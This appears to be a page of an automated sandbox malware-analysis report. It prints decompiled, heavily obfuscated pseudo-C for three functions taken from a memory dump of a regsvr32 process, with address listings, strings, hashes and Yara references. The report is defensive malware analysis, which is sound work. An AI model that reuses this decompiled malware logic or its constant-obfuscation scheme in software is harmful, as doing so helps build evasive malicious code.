Function 040D4BFC, Relevance: 5.2, Strings: 4, Instructions: 245
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040D4BFC(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				unsigned int _v112;
				intOrPtr* _t246;
				signed int _t258;
				intOrPtr _t259;
				intOrPtr _t260;
				signed int _t262;
				intOrPtr _t266;
				intOrPtr _t267;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				intOrPtr _t297;
				void* _t299;
				signed int _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				unsigned int* _t303;
				unsigned int* _t304;

				_t260 = __ecx;
				_t303 =  &_v112;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0xe57752;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x00000395;
				_v84 = 0xa7b43c;
				_v84 = _v84 << 0xc;
				_t299 = 0x791519f;
				_v20 = _v20 & 0x00000000;
				_t291 = 0x69;
				_v84 = _v84 / _t291;
				_v84 = _v84 ^ 0x0126ef50;
				_v64 = 0x5471f4;
				_v64 = _v64 << 0xf;
				_v64 = _v64 ^ 0x38ff966c;
				_v108 = 0xe1a857;
				_v108 = _v108 >> 7;
				_v108 = _v108 << 0xf;
				_v108 = _v108 >> 0xf;
				_v108 = _v108 ^ 0x000c4d53;
				_v112 = 0xe3e3b6;
				_t292 = 0x1c;
				_t258 = 0x3d;
				_v112 = _v112 * 0x7f;
				_v112 = _v112 ^ 0x4177f445;
				_v112 = _v112 >> 8;
				_v112 = _v112 ^ 0x003f3c7e;
				_v60 = 0xdb6601;
				_v60 = _v60 | 0x1a9202c7;
				_v60 = _v60 ^ 0x1ad2035c;
				_v104 = 0x132994;
				_v104 = _v104 / _t292;
				_v104 = _v104 + 0x3dcb;
				_v104 = _v104 | 0x8aefcc47;
				_v104 = _v104 ^ 0x8ae713b1;
				_v80 = 0x4c94ef;
				_v80 = _v80 / _t258;
				_v80 = _v80 + 0xffffb573;
				_v80 = _v80 ^ 0x000791ec;
				_v48 = 0x6ce617;
				_v48 = _v48 ^ 0x91a29be4;
				_v48 = _v48 ^ 0x91c139dc;
				_v52 = 0x59f0b3;
				_v52 = _v52 ^ 0x18747c17;
				_v52 = _v52 ^ 0x182d8be2;
				_v56 = 0x3df981;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x3dfc4daf;
				_v76 = 0x62b80;
				_t293 = 0x5d;
				_v76 = _v76 / _t293;
				_v76 = _v76 + 0xffffe926;
				_v76 = _v76 ^ 0xfff7137f;
				_v72 = 0x7226d;
				_v72 = _v72 >> 1;
				_v72 = _v72 + 0x788a;
				_v72 = _v72 ^ 0x000e590c;
				_v96 = 0x39de81;
				_v96 = _v96 + 0x1ccc;
				_v96 = _v96 ^ 0xfb454dc1;
				_v96 = _v96 ^ 0xf28cd76a;
				_v96 = _v96 ^ 0x09fed289;
				_v100 = 0xca2105;
				_v100 = _v100 | 0x676862be;
				_v100 = _v100 + 0xffff68c4;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0xfa784873;
				_v40 = 0xc4a147;
				_v40 = _v40 ^ 0x45259758;
				_v40 = _v40 ^ 0x45e701de;
				_v44 = 0x2d23a0;
				_t294 = 0x11;
				_t302 = _v8;
				_v44 = _v44 * 0x52;
				_v44 = _v44 ^ 0x0e7a51ec;
				_v92 = 0x79a225;
				_v92 = _v92 / _t294;
				_v92 = _v92 >> 9;
				_v92 = _v92 | 0x8583c695;
				_v92 = _v92 ^ 0x858adeed;
				_v88 = 0xed07fb;
				_v88 = _v88 + 0x2638;
				_t295 = 0x61;
				_v88 = _v88 / _t295;
				_t296 = 0xa;
				_t297 = _v4;
				_v88 = _v88 / _t296;
				_v88 = _v88 ^ 0x000a4d02;
				_v32 = 0x581804;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x01684d46;
				_v68 = 0xe8e83;
				_v68 = _v68 | 0xc7c33aae;
				_t259 = _v8;
				_v68 = _v68 / _t258;
				_v68 = _v68 ^ 0x0347a863;
				_t240 = _v36;
				L1:
				while(1) {
					do {
						while(_t299 != 0x16cba6e) {
							if(_t299 == 0x286464d) {
								_t297 = 0x10000;
								_push(_t260);
								_push(_t260);
								_t240 = E040DC5D8(0x10000);
								_t259 = _t240;
								_t303 =  &(_t303[3]);
								if(_t259 != 0) {
									_v36 = _t240;
									_t302 = 0x10000;
									L7:
									_t260 = _v24;
									_t299 = 0x16cba6e;
									continue;
								}
							} else {
								if(_t299 != 0x791519f) {
									goto L15;
								} else {
									_t299 = 0x286464d;
									continue;
								}
							}
							goto L16;
						}
						_t262 = E040E9C65(_v60,  &_v16, _t240, _t260, _t302, _v104, _v80);
						_t303 =  &(_t303[5]);
						_v20 = _t262;
						if(_t262 == 0) {
							L14:
							_t260 = _v24;
							_t299 = 0xcecd29d;
							goto L15;
						} else {
							_t266 = _v16;
							if(_t266 == 0) {
								goto L14;
							} else {
								_t240 = _v36 + _t266;
								_v36 = _v36 + _t266;
								_t302 = _t302 - _t266;
								if(_t302 != 0) {
									goto L7;
								} else {
									_t267 = _t297 + _t297;
									_push(_t267);
									_push(_t267);
									_v12 = _t267;
									_t301 = E040DC5D8(_t267);
									_t304 =  &(_t303[3]);
									if(_t301 != 0) {
										E040EC9B0(_v72, _t301, _v96, _t297, _t259, _v100);
										E040F2B09(_v40, _t259, _v44, _v92);
										_t302 = _t297;
										_t240 = _t301 + _t297;
										_t297 = _v12;
										_t303 =  &(_t304[6]);
										_v36 = _t240;
										_t259 = _t301;
										if(_t302 != 0) {
											goto L7;
										}
									}
								}
							}
						}
						break;
						L15:
						_t240 = _v36;
					} while (_t299 != 0xcecd29d);
					L16:
					_t300 = _v20;
					if(_t300 != 0) {
						_t246 = _v8;
						 *_t246 = _t259;
						 *((intOrPtr*)(_t246 + 4)) = _t297 - _t302;
					} else {
						E040F2B09(_v88, _t259, _v32, _v68);
					}
					return _t300;
				}
			}

0x040d4bfc
0x040d4bfc
0x040d4c03
0x040d4c07
0x040d4c0b
0x040d4c13
0x040d4c18
0x040d4c20
0x040d4c28
0x040d4c31
0x040d4c3a
0x040d4c3f
0x040d4c44
0x040d4c4a
0x040d4c52
0x040d4c5a
0x040d4c5f
0x040d4c67
0x040d4c6f
0x040d4c74
0x040d4c79
0x040d4c7e
0x040d4c86
0x040d4c93
0x040d4c96
0x040d4c99
0x040d4c9d
0x040d4ca5
0x040d4caa
0x040d4cb2
0x040d4cba
0x040d4cc2
0x040d4cca
0x040d4cda
0x040d4cde
0x040d4ce6
0x040d4cee
0x040d4cf6
0x040d4d06
0x040d4d0a
0x040d4d12
0x040d4d1a
0x040d4d22
0x040d4d2a
0x040d4d32
0x040d4d3a
0x040d4d42
0x040d4d4a
0x040d4d52
0x040d4d57
0x040d4d5f
0x040d4d6b
0x040d4d6e
0x040d4d72
0x040d4d7a
0x040d4d82
0x040d4d8a
0x040d4d8e
0x040d4d96
0x040d4d9e
0x040d4da6
0x040d4dae
0x040d4db6
0x040d4dc0
0x040d4dc8
0x040d4dd0
0x040d4dd8
0x040d4de0
0x040d4de5
0x040d4ded
0x040d4df5
0x040d4dfd
0x040d4e05
0x040d4e14
0x040d4e17
0x040d4e1b
0x040d4e1f
0x040d4e27
0x040d4e37
0x040d4e3b
0x040d4e40
0x040d4e48
0x040d4e50
0x040d4e58
0x040d4e64
0x040d4e69
0x040d4e73
0x040d4e78
0x040d4e7c
0x040d4e80
0x040d4e88
0x040d4e90
0x040d4e95
0x040d4e9d
0x040d4ea5
0x040d4eb3
0x040d4eb7
0x040d4ebb
0x040d4ec3
0x00000000
0x040d4ec7
0x040d4ec7
0x040d4ec7
0x040d4ed5
0x040d4eee
0x040d4eff
0x040d4f00
0x040d4f02
0x040d4f07
0x040d4f09
0x040d4f0e
0x040d4f14
0x040d4f18
0x040d4f1a
0x040d4f1a
0x040d4f1e
0x00000000
0x040d4f1e
0x040d4ed7
0x040d4edd
0x00000000
0x040d4ee3
0x040d4ee3
0x00000000
0x040d4ee3
0x040d4edd
0x00000000
0x040d4ed5
0x040d4f3d
0x040d4f3f
0x040d4f42
0x040d4f48
0x040d4fd5
0x040d4fd5
0x040d4fd9
0x00000000
0x040d4f4e
0x040d4f4e
0x040d4f54
0x00000000
0x040d4f56
0x040d4f5a
0x040d4f5c
0x040d4f60
0x040d4f62
0x00000000
0x040d4f64
0x040d4f68
0x040d4f77
0x040d4f78
0x040d4f7a
0x040d4f86
0x040d4f88
0x040d4f8d
0x040d4f9f
0x040d4fb2
0x040d4fb7
0x040d4fb9
0x040d4fbc
0x040d4fc3
0x040d4fc6
0x040d4fca
0x040d4fce
0x00000000
0x040d4fd0
0x040d4fce
0x040d4f8d
0x040d4f62
0x040d4f54
0x00000000
0x040d4fde
0x040d4fde
0x040d4fe2
0x040d4fee
0x040d4fee
0x040d4ff4
0x040d5011
0x040d5017
0x040d5019
0x040d4ff6
0x040d5004
0x040d500e
0x040d5025
0x040d5025

Strings

~<?, xrefs: 040D4CAA
~<?, xrefs: 040D4C8E
Rw, xrefs: 040D4C0B
8&, xrefs: 040D4E58

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 8&$Rw$~<?$~<?
API String ID: 0-2119221410
Opcode ID: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction ID: 9c1f00cd670cb491b748f5b4d1e39dffb46ffd1ff1169a3b0987c31491f02021
Opcode Fuzzy Hash: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction Fuzzy Hash: BFB11F716093419FC358CF6AC48991FFBE1BBC4758F50892DF9A596220D3B4E949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 040F2D53, Relevance: 5.2, Strings: 4, Instructions: 221
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E040F2D53(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				void* _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				void* _t267;
				void* _t268;
				signed int* _t271;
				signed int* _t272;

				_t271 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xb3680a;
				_v8 = 0x44a7b2;
				_v84 = 0x16e473;
				_v84 = _v84 | 0xff7fd6cb;
				_v84 = _v84 << 0xe;
				_v84 = _v84 ^ 0xfdb25567;
				_v88 = 0x1491df;
				_v88 = _v88 | 0x25bec09f;
				_v88 = _v88 + 0xf90e;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xcae39943;
				_v92 = 0xaddb4a;
				_v92 = _v92 ^ 0x38a1add8;
				_t267 = __edx;
				_t243 = __ecx;
				_t245 = 0x27;
				_t268 = 0x72ed85;
				_v92 = _v92 / _t245;
				_t246 = 0x26;
				_v92 = _v92 * 0x56;
				_v92 = _v92 ^ 0x7b991acf;
				_v36 = 0x41254;
				_v36 = _v36 ^ 0x82dbc96b;
				_v36 = _v36 ^ 0x82dd2337;
				_v28 = 0x754151;
				_v28 = _v28 + 0x3d65;
				_v28 = _v28 ^ 0x0076627a;
				_v76 = 0xa9aca8;
				_v76 = _v76 * 0x46;
				_v76 = _v76 << 0x10;
				_v76 = _v76 * 0x71;
				_v76 = _v76 ^ 0xcef7d733;
				_v80 = 0x19ef1d;
				_v80 = _v80 + 0x4807;
				_v80 = _v80 >> 0x10;
				_t247 = 9;
				_v80 = _v80 / _t246;
				_v80 = _v80 ^ 0x000e4732;
				_v32 = 0xb4891b;
				_v32 = _v32 | 0x91ee1565;
				_v32 = _v32 ^ 0x91f206c4;
				_v52 = 0xb65ed8;
				_v52 = _v52 ^ 0x53a92618;
				_v52 = _v52 * 0x77;
				_v52 = _v52 ^ 0xa3a75cc7;
				_v20 = 0xeecfa7;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x3bb2e2c4;
				_v72 = 0xfbd7a5;
				_v72 = _v72 ^ 0x9f68e208;
				_v72 = _v72 << 8;
				_v72 = _v72 | 0x30258995;
				_v72 = _v72 ^ 0xb3385db1;
				_v24 = 0x1aaffc;
				_v24 = _v24 * 0x36;
				_v24 = _v24 ^ 0x05ac1646;
				_v16 = 0xb69c42;
				_v16 = _v16 + 0x3887;
				_v16 = _v16 ^ 0x00b1c7d8;
				_v44 = 0x5789e3;
				_v44 = _v44 / _t247;
				_v44 = _v44 + 0xffffe7e6;
				_v44 = _v44 ^ 0x00087fde;
				_v68 = 0x94873;
				_v68 = _v68 << 0xf;
				_v68 = _v68 + 0xffff48e1;
				_v68 = _v68 ^ 0x69c9ade9;
				_v68 = _v68 ^ 0xcdf62ffc;
				_v48 = 0x208212;
				_v48 = _v48 | 0x39c03c72;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 ^ 0x0008cd3c;
				_v96 = 0x3b2be3;
				_v96 = _v96 ^ 0x07755c49;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x076fdb2f;
				_v96 = _v96 ^ 0x07616547;
				_v100 = 0xac4dde;
				_v100 = _v100 + 0x3900;
				_t248 = 0x42;
				_v100 = _v100 * 0x54;
				_v100 = _v100 ^ 0x672a87d3;
				_v100 = _v100 ^ 0x5fb939da;
				_v104 = 0x9fab94;
				_v104 = _v104 ^ 0x81ae57b6;
				_v104 = _v104 | 0x48b65982;
				_v104 = _v104 * 0x3c;
				_v104 = _v104 ^ 0x471b6d30;
				_v56 = 0x9acae2;
				_v56 = _v56 << 3;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 ^ 0x000181ed;
				_v60 = 0x9f5509;
				_v60 = _v60 / _t248;
				_v60 = _v60 >> 3;
				_v60 = _v60 + 0xfffff221;
				_v60 = _v60 ^ 0x000ffb1e;
				_v40 = 0x6ff3a2;
				_v40 = _v40 << 9;
				_v40 = _v40 + 0x9f22;
				_v40 = _v40 ^ 0xdfef744e;
				_v64 = 0xeafe6e;
				_v64 = _v64 ^ 0x9deccfb6;
				_v64 = _v64 << 0xf;
				_v64 = _v64 * 0x79;
				_v64 = _v64 ^ 0xc780890d;
				while(1) {
					L1:
					_t237 = 0xd8fe181;
					do {
						L2:
						while(_t268 != 0x72ed85) {
							if(_t268 == 0xb6c7232) {
								_t263 = _v44;
								_t248 = _v16;
								_t238 = E040F1005(_v16, _v44, _v68, _v48,  *((intOrPtr*)(_t267 + 0x38)));
								_t271 =  &(_t271[3]);
								 *((intOrPtr*)(_t267 + 0x2c)) = _t238;
								__eflags = _t238;
								_t237 = 0xd8fe181;
								_t268 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t268 == 0xc5020c9) {
								_push(_v36);
								_t239 = E040F3263(_v84, _v88, __eflags, _t243, _v92, _t248);
								_t272 =  &(_t271[4]);
								 *((intOrPtr*)(_t267 + 0x38)) = _t239;
								__eflags = _t239;
								if(_t239 != 0) {
									E040F148A(_t239, _t239, _v28, _v76, _v80, _v32);
									_t263 = _v20;
									_t248 = _v52;
									E040DE2BD(_v20, _v72,  *((intOrPtr*)(_t267 + 0x38)), _v24);
									_t271 =  &(_t272[7]);
									_t268 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t268 == 0xd6f812a) {
									return E040DF0E9(_v60,  *((intOrPtr*)(_t267 + 0x38)), _v40, _v64);
								}
								if(_t268 != _t237) {
									goto L13;
								} else {
									_t239 = E040E0EBC(_v96, _t263, _v100, _v96, _v104, _v56, _v96, _t248, _t267, E040EA2A5);
									_t271 =  &(_t271[8]);
									 *((intOrPtr*)(_t267 + 0x48)) = _t239;
									if(_t239 == 0) {
										_t268 = 0xd6f812a;
										while(1) {
											L1:
											_t237 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t239;
						}
						_t268 = 0xc5020c9;
						L13:
						__eflags = _t268 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t237;
				}
			}

0x040f2d53
0x040f2d56
0x040f2d5b
0x040f2d63
0x040f2d6b
0x040f2d73
0x040f2d7b
0x040f2d80
0x040f2d88
0x040f2d90
0x040f2d98
0x040f2da0
0x040f2da5
0x040f2dad
0x040f2db5
0x040f2dc7
0x040f2dc9
0x040f2dcb
0x040f2dce
0x040f2dd7
0x040f2de2
0x040f2de5
0x040f2de9
0x040f2df1
0x040f2df9
0x040f2e01
0x040f2e09
0x040f2e11
0x040f2e19
0x040f2e21
0x040f2e2e
0x040f2e32
0x040f2e3c
0x040f2e40
0x040f2e48
0x040f2e50
0x040f2e58
0x040f2e63
0x040f2e64
0x040f2e68
0x040f2e70
0x040f2e78
0x040f2e80
0x040f2e88
0x040f2e90
0x040f2e9d
0x040f2ea1
0x040f2ea9
0x040f2eb1
0x040f2eb6
0x040f2ebe
0x040f2ec6
0x040f2ece
0x040f2ed3
0x040f2edb
0x040f2ee3
0x040f2ef0
0x040f2ef4
0x040f2efc
0x040f2f04
0x040f2f0c
0x040f2f16
0x040f2f26
0x040f2f2c
0x040f2f39
0x040f2f41
0x040f2f49
0x040f2f4e
0x040f2f56
0x040f2f5e
0x040f2f66
0x040f2f6e
0x040f2f76
0x040f2f7b
0x040f2f83
0x040f2f8b
0x040f2f93
0x040f2f98
0x040f2fa0
0x040f2fa8
0x040f2fb0
0x040f2fbd
0x040f2fbe
0x040f2fc2
0x040f2fca
0x040f2fd2
0x040f2fda
0x040f2fe2
0x040f2fef
0x040f2ff3
0x040f2ffb
0x040f3003
0x040f3008
0x040f300d
0x040f3015
0x040f3023
0x040f3027
0x040f302c
0x040f3034
0x040f303c
0x040f3044
0x040f3049
0x040f3051
0x040f3059
0x040f3061
0x040f3069
0x040f3073
0x040f3077
0x040f307f
0x040f307f
0x040f307f
0x040f3084
0x00000000
0x040f3084
0x040f3096
0x040f3155
0x040f3159
0x040f315d
0x040f3162
0x040f3165
0x040f3168
0x040f316c
0x040f3171
0x00000000
0x040f3171
0x040f30a2
0x040f30e4
0x040f30f6
0x040f30fb
0x040f30fe
0x040f3101
0x040f3103
0x040f311d
0x040f312d
0x040f3134
0x040f3138
0x040f313d
0x040f3140
0x00000000
0x040f3140
0x040f30a4
0x040f30a6
0x00000000
0x040f31a1
0x040f30ae
0x00000000
0x040f30b4
0x040f30cd
0x040f30d2
0x040f30d5
0x040f30da
0x040f30e0
0x040f307f
0x040f307f
0x040f307f
0x00000000
0x040f307f
0x040f307f
0x040f30da
0x040f30ae
0x040f31a9
0x040f31a9
0x040f3179
0x040f317e
0x040f317e
0x040f317e
0x00000000
0x040f3084

Strings

+;, xrefs: 040F2F83
sH, xrefs: 040F2F41
$P, xrefs: 040F2DC3, 040F30B9
zbv, xrefs: 040F2E19

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$sH$zbv$+;
API String ID: 0-3806253346
Opcode ID: 2cad79c14b2968e7f2c0eb06ca48385c109999eb6efd73979435816fe1b17ad6
Instruction ID: cdae1a14d6b80a4491ad0ac330487092825f3ecfb0d02dabe5a4933a9deb4ba2
Opcode Fuzzy Hash: 2cad79c14b2968e7f2c0eb06ca48385c109999eb6efd73979435816fe1b17ad6
Instruction Fuzzy Hash: 05B11172508381AFD398CF61C88A41BFBE1BBC4358F509A2DF59696660D3B1D949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 040EE4E5, Relevance: 5.2, Strings: 4, Instructions: 220
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E040EE4E5(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v124;
				intOrPtr _v140;
				char _v152;
				char _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				unsigned int _v200;
				void* __ecx;
				void* _t118;
				signed int _t141;
				void* _t151;
				intOrPtr _t166;
				intOrPtr _t182;
				signed int _t183;
				intOrPtr _t184;
				signed int* _t187;
				void* _t189;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E040EFE29(_t118);
				_v196 = 0x42a34f;
				_t187 =  &(( &_v200)[5]);
				_v196 = _v196 + 0xffffd591;
				_v196 = _v196 >> 8;
				_t182 = 0;
				_v196 = _v196 >> 0xd;
				_t151 = 0x8265549;
				_v196 = _v196 ^ 0x000e54fd;
				_v192 = 0xf4ad66;
				_t183 = 0x28;
				_v192 = _v192 * 0x74;
				_v192 = _v192 + 0xffff9a5e;
				_v192 = _v192 * 0x25;
				_v192 = _v192 ^ 0x06100388;
				_v164 = 0xada112;
				_v164 = _v164 << 6;
				_v164 = _v164 ^ 0x2b616de0;
				_v188 = 0x6e3b94;
				_v188 = _v188 * 0x6f;
				_v188 = _v188 ^ 0xb2fa2ce6;
				_v188 = _v188 >> 2;
				_v188 = _v188 ^ 0x27407061;
				_v184 = 0x76ba26;
				_v184 = _v184 ^ 0xa3b8c1ec;
				_v184 = _v184 * 6;
				_v184 = _v184 ^ 0xd6d91427;
				_v172 = 0x136254;
				_v172 = _v172 + 0x2ded;
				_v172 = _v172 ^ 0x001b6319;
				_v200 = 0xa09af9;
				_v200 = _v200 + 0x31d;
				_v200 = _v200 + 0xffff390b;
				_v200 = _v200 >> 0xc;
				_v200 = _v200 ^ 0x000c9fcd;
				_v176 = 0xee2a82;
				_v176 = _v176 / _t183;
				_v176 = _v176 ^ 0x000a5024;
				_t66 =  &_v176; // 0xa5024
				_t184 =  *_t66;
				_v180 = 0xbc2dba;
				_v180 = _v180 << 0xa;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x6e88cd95;
				_v168 = 0x8f86b;
				_v168 = _v168 * 0x73;
				_v168 = _v168 ^ 0x040961a3;
				while(1) {
					_t189 = _t151 - 0x90fe06e;
					if(_t189 > 0) {
						goto L23;
					}
					L2:
					if(_t189 == 0) {
						__eflags = _v140 - 3;
						if(__eflags == 0) {
							E040F00EF( &_v152);
							L16:
							_t151 = 0x574a4dd;
							continue;
							do {
								while(1) {
									_t189 = _t151 - 0x90fe06e;
									if(_t189 > 0) {
										goto L23;
									}
									goto L2;
								}
								L45:
								__eflags = _t151 - 0x4105f99;
							} while (__eflags != 0);
							L46:
							return _t182;
						}
						_t151 = 0xaf84b7f;
						while(1) {
							_t189 = _t151 - 0x90fe06e;
							if(_t189 > 0) {
								goto L23;
							}
							goto L2;
						}
						goto L23;
					}
					if(_t151 == 0x172cdb8) {
						_push(_t151);
						_push(_t151);
						_t184 = E040DC5D8(0x5c);
						_t187 =  &(_t187[3]);
						__eflags = _t184;
						if(__eflags == 0) {
							L14:
							_t151 = 0x666f2cd;
							continue;
						}
						 *((intOrPtr*)(_t184 + 0x30)) = _v80;
						 *((intOrPtr*)(_t184 + 8)) = _v124;
						 *((intOrPtr*)(_t184 + 4)) = _v92;
						_t151 = 0xc6d3ff5;
						continue;
					}
					if(_t151 == 0x2270dbc) {
						__eflags = _v140 - 7;
						if(__eflags == 0) {
							E040E7D5B( &_v152);
						}
						goto L16;
					}
					if(_t151 == 0x39f0156) {
						__eflags = E040E9D3E( &_v60, _v164, __eflags, _v188,  &_v160);
						if(__eflags == 0) {
							goto L46;
						}
						goto L14;
					}
					if(_t151 == 0x574a4dd) {
						_t166 =  *0x40f6210; // 0x0
						_t182 = _t182 + 1;
						__eflags = _t182;
						 *((intOrPtr*)(_t184 + 0x24)) =  *((intOrPtr*)(_t166 + 0x210));
						 *((intOrPtr*)(_t166 + 0x210)) = _t184;
						L12:
						_t151 = 0x39f0156;
						continue;
					}
					if(_t151 == 0x666f2cd) {
						_t141 = E040E8806(_v184, _v172,  &_v160,  &_v152);
						asm("sbb ecx, ecx");
						_t151 = ( ~_t141 & 0xfdd3cc62) + 0x39f0156;
						continue;
					}
					if(_t151 != 0x8265549) {
						goto L45;
					}
					E040D22A6(_a4, _v196,  &_v60, _v192);
					_t187 =  &(_t187[2]);
					_t151 = 0xf4b2976;
					continue;
					L23:
					__eflags = _t151 - 0x9a4295f;
					if(_t151 == 0x9a4295f) {
						__eflags = _v140 - 5;
						if(__eflags == 0) {
							E040F2D53( &_v152, _t184);
							_t151 = 0x574a4dd;
							goto L45;
						}
						_t151 = 0xa7bb9ce;
						continue;
					}
					__eflags = _t151 - 0xa7bb9ce;
					if(_t151 == 0xa7bb9ce) {
						__eflags = _v140 - 6;
						if(__eflags == 0) {
							E040EA474( &_v152);
							goto L16;
						}
						_t151 = 0x2270dbc;
						continue;
					}
					__eflags = _t151 - 0xaf84b7f;
					if(_t151 == 0xaf84b7f) {
						__eflags = _v140 - 4;
						if(__eflags == 0) {
							E040D238C( &_v152);
							goto L16;
						}
						_t151 = 0x9a4295f;
						continue;
					}
					__eflags = _t151 - 0xbf40480;
					if(_t151 == 0xbf40480) {
						__eflags = _v140 - 2;
						if(__eflags == 0) {
							E040ECCD9( &_v152, _t184);
							goto L16;
						}
						_t151 = 0x90fe06e;
						continue;
					}
					__eflags = _t151 - 0xc6d3ff5;
					if(_t151 == 0xc6d3ff5) {
						__eflags = _v140 - 1;
						if(__eflags == 0) {
							E040DA871( &_v152);
							goto L16;
						}
						_t151 = 0xbf40480;
						continue;
					}
					__eflags = _t151 - 0xf4b2976;
					if(_t151 != 0xf4b2976) {
						goto L45;
					}
					E040DB820(0);
					goto L12;
				}
			}

0x040ee4ef
0x040ee4f6
0x040ee4fd
0x040ee504
0x040ee506
0x040ee50b
0x040ee513
0x040ee516
0x040ee520
0x040ee525
0x040ee527
0x040ee52c
0x040ee531
0x040ee53e
0x040ee552
0x040ee553
0x040ee557
0x040ee564
0x040ee568
0x040ee570
0x040ee578
0x040ee57d
0x040ee585
0x040ee592
0x040ee596
0x040ee59e
0x040ee5a3
0x040ee5ab
0x040ee5b3
0x040ee5c0
0x040ee5c4
0x040ee5cc
0x040ee5d4
0x040ee5dc
0x040ee5e4
0x040ee5ec
0x040ee5f4
0x040ee5fc
0x040ee601
0x040ee609
0x040ee617
0x040ee61b
0x040ee623
0x040ee623
0x040ee627
0x040ee62f
0x040ee634
0x040ee639
0x040ee641
0x040ee64e
0x040ee652
0x040ee65a
0x040ee65a
0x040ee660
0x00000000
0x00000000
0x040ee666
0x040ee666
0x040ee79d
0x040ee7a2
0x040ee7b2
0x040ee747
0x040ee747
0x040ee749
0x040ee65a
0x040ee65a
0x040ee65a
0x040ee660
0x00000000
0x00000000
0x00000000
0x040ee660
0x040ee89d
0x040ee89d
0x040ee89d
0x040ee8a9
0x040ee8b5
0x040ee8b5
0x040ee7a4
0x040ee65a
0x040ee65a
0x040ee660
0x00000000
0x00000000
0x00000000
0x040ee660
0x00000000
0x040ee65a
0x040ee672
0x040ee769
0x040ee76a
0x040ee772
0x040ee774
0x040ee777
0x040ee779
0x040ee736
0x040ee736
0x00000000
0x040ee736
0x040ee782
0x040ee789
0x040ee790
0x040ee793
0x00000000
0x040ee793
0x040ee67e
0x040ee740
0x040ee745
0x040ee752
0x040ee752
0x00000000
0x040ee745
0x040ee686
0x040ee72e
0x040ee730
0x00000000
0x00000000
0x00000000
0x040ee730
0x040ee68e
0x040ee6f6
0x040ee6fc
0x040ee6fc
0x040ee703
0x040ee706
0x040ee70c
0x040ee70c
0x00000000
0x040ee70c
0x040ee696
0x040ee6dc
0x040ee6e7
0x040ee6ef
0x00000000
0x040ee6ef
0x040ee69e
0x00000000
0x00000000
0x040ee6bb
0x040ee6c0
0x040ee6c3
0x00000000
0x040ee7b9
0x040ee7b9
0x040ee7bf
0x040ee87f
0x040ee884
0x040ee896
0x040ee89b
0x00000000
0x040ee89b
0x040ee886
0x00000000
0x040ee886
0x040ee7c5
0x040ee7cb
0x040ee860
0x040ee865
0x040ee875
0x00000000
0x040ee875
0x040ee867
0x00000000
0x040ee867
0x040ee7d1
0x040ee7d7
0x040ee841
0x040ee846
0x040ee856
0x00000000
0x040ee856
0x040ee848
0x00000000
0x040ee848
0x040ee7d9
0x040ee7df
0x040ee820
0x040ee825
0x040ee837
0x00000000
0x040ee837
0x040ee827
0x00000000
0x040ee827
0x040ee7e1
